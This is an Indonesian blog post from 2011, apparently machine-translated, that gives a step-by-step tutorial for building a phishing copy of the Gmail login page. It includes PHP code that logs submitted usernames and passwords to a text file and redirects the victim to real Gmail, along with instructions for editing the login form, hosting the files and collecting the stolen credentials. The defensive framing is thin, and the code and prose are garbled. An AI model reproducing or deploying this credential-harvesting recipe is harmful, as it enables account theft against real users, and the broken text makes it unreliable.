Kamis, 17 November 2011

PHISING TUTORIAL

Phishing Tutorial

Phishing adalah proses mencuri informasi sensitif, seperti

username, password, dan informasi bank, dengan berpura-pura menjadi seseorang
Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker
berpura-pura menjadi bank Anda. Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk
memperbarui account Anda sebelum kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah
Anda klik pada Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login
rincian, itu mengirimnya ke email hacker atau toko di server web nya. Hacker yang
menciptakan yang terbaik, paling menipu halaman web phishing yang berpengetahuan di
daerah HTML dan pemrograman PHP. Di bawah ini saya akan menunjukkan contoh sederhana
beberapa langkah-langkah hacker yang dibutuhkan untuk membuat situs web phishing. Dengan melihat
langkah hacker akan ambil, akan membantu Anda mempertahankan diri dari serangan itu.

1. Pertama hacker memilih target. Yang paling populer target phishing

serangan layanan e-mail seperti Hotmail dan Gmail karena mereka
yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda, dia juga
mendapat akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain
Anda gunakan. Dalam contoh ini kita akan berpura-pura hacker memilih Gmail sebagai nya
target.

2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan

Seluruh halaman utama. Saya menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan
browser untuk keamanan dan kustomisasi) Jadi saya akan pergi ke.
http://www.gmail.com
dan klik File -> halaman Simpan sebagai ..., atau cukup tekan + S
yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan
halaman web dan tekan Simpan.




3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The

alasan Anda ingin nama "index" begitu ketika Anda meng-upload ke web
host dan seseorang pergi ke Icon_charly_link_green, halaman indeks adalah halaman pertama yang
muncul.

4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya

menguatkan informasi Anda. Di bawah ini adalah script PHP sederhana yang log dan
menyimpan informasi login Anda ketika Anda klik "Sign in". Untuk melihat cara kerjanya,
copy dan paste kode berikut ke notepad. Selanjutnya simpan ke dalam
direktori yang sama seperti Anda menyimpan halaman Gmail, dan nama itu phish.php. Dalam
Selain ke halaman phish.php, membuat file teks baru kosong dan beri nama list.txt.
PHP Code:
<?php // This marks the beginning of the PHP script. 

PHP Code:
Header(“Location:https://www.google.com/accounts/Serv...=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.co m%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=defa ult&ltmplcac
he
=2 â€œ); // once you click â€œSign in” in the fake website, this redirectsyou to the real Gmail websitemaking the whole process look more
legit


PHP Code:
$handle fopen(“list.txt”“a”); // this tells the server to open the file“list.txt” and get it ready for appending dataWhich in this case is your
username 
and password


PHP Code:
Foreach($_GET as $variable => $value) {
    
fwrite($handle$variable);
    
fwrite($handle“=”);
    
fwrite($handle$value);
    
fwrite($handle“rn”);
    } 
// This section simply assigns all the information going through
    
this form to a variableThis includes your username and password.
    
Fwrite($handle“rn”); // This writes your details to the file â€œlist.txt”
    
fclose($handle); // This simply closes the connection to the file
    
“list.txt”
    
exit; 
> /? / Marks akhir program PHP.

Sejauh ini anda akan melihat berikut di folder anda:



5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya
PHP script. Untuk melihat apa yang akan dilakukan hacker, membuka Gmail utama
halaman yang bernama index.htm dengan notepad.

6. Tekan + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".



7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script
dan Anda harus melihat:

bentuk

PHP Code:
<id "gaia_loginform" action "https: / / www.google.com/accounts/Serv...?service=mail" 

Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki
yang benar dengan melihat "bentuk id" nama di atas. Ubah Icon_charly_link_green yang
antara action = "" untuk phish.php. Ini akan membuat bentuk tunduk kepada
Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan melihat
kode:

metode = "post"

Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET".
Apa yang dilakukan adalah metode GET menyampaikan informasi yang Anda ketik
melalui URL sehingga script PHP dapat log itu.

8. Simpan dan tutup file tersebut.

9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang
mendukung PHP. Dengan pencarian Google sederhana Anda bisa datang dengan
banyak yang termasuk dalam kategori ini.

10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada
"List.txt" file. Setiap perusahaan hosting harus memiliki pilihan CHMOD berikutnya
ke setiap file. Pilih opsi ini dan mengubah izin file untuk
"List.txt" ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-orang yang
menggunakan host yang sama atau hanya sesuatu yang mirip dengan Google:
"Yourwebhostname chmod".

11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green
Anda untuk website Anda dan Anda akan melihat replika halaman Gmail. Ketik
username / password dan klik Daftar masuk ini seharusnya diarahkan Anda
ke halaman Gmail nyata.
12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda
manajer atau akan
http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini
yang paling umum web host yang anda gunakan dapat memberikan yang berbeda
mencari URL. Sekarang jika saya menaruh nama pengguna dari "myusername" dan password
dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:


PHP Code:
ltmpl = defaultltmplcache 2
terus 
http://mail.google.com/mail/?service mail
rm
-palsu
Email 
username
Passwd 
mypassword
rmShown 
1
signin 
Masuk
AST 

Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan
sandi. Scary, eh? hehehehe

Tidak ada komentar:

Posting Komentar

 
./BoeimCyber © 2011 Templates | Boeim